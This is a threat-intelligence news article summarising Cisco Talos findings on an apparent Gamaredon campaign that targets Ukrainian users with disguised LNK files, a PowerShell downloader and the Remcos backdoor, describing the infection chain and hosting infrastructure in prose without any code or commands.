The Cisco Talos threat intelligence team has detailed an ongoing campaign targeting users in Ukraine, which has been active since at least November 2024.
The campaign leverages malicious LNK files that run a PowerShell downloader, leading to the installation of the Remcos backdoor. The campaign is believed to be linked to the notorious Gamaredon threat actor (aka Primitive Bear, Armageddon, UNC530, ACTINIUM, or Aqua Blizzard), a suspected Russian cyber espionage group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013.
The malicious LNK files are disguised as legitimate files, with filenames using Russian terms related to military movements in Ukraine to lure victims into opening the files, which are often delivered in phishing emails.
Upon execution, the LNK file activates a PowerShell downloader that contacts geo-fenced servers located in Russia and Germany. The downloader retrieves a second-stage ZIP file containing the Remcos backdoor, which is then executed using a DLL side-loading technique. The backdoor gives attackers the ability to remotely control compromised machines.
The LNK files in this campaign bear similarities to those seen in past Gamaredon operations, which have consistently involved the use of ZIP archives and the distribution of malicious files disguised as documents related to the ongoing conflict in Ukraine.
While Talos has not pinpointed the exact method by which the malicious LNK files are distributed, it is likely that Gamaredon continues to employ phishing emails to distribute the files. The emails may either have the ZIP file attached directly or contain a URL link leading to a remote download location. The attacks are localized, with the servers responsible for hosting the malicious payloads and decoy documents being restricted to Ukraine-based victims.
Notably, Talos observed that all servers used in this campaign returned an HTTP error 403 when attempts were made to download the payload, indicating that the servers may have been taken offline or restricted for certain regions.
However, evidence suggests that the malicious servers were still hosting payloads for select regions at the time of the investigation. The servers were primarily hosted by two Internet Service Providers (ISPs): GTHost and HyperHosting. In addition to hosting the malicious files, at least one of these servers has been identified as functioning as the command-and-control (C2) server for the Remcos backdoor.
The Remcos backdoor gives the attacker full control over the infected machine, allowing them to steal data, execute arbitrary commands, and maintain persistence within the compromised network.
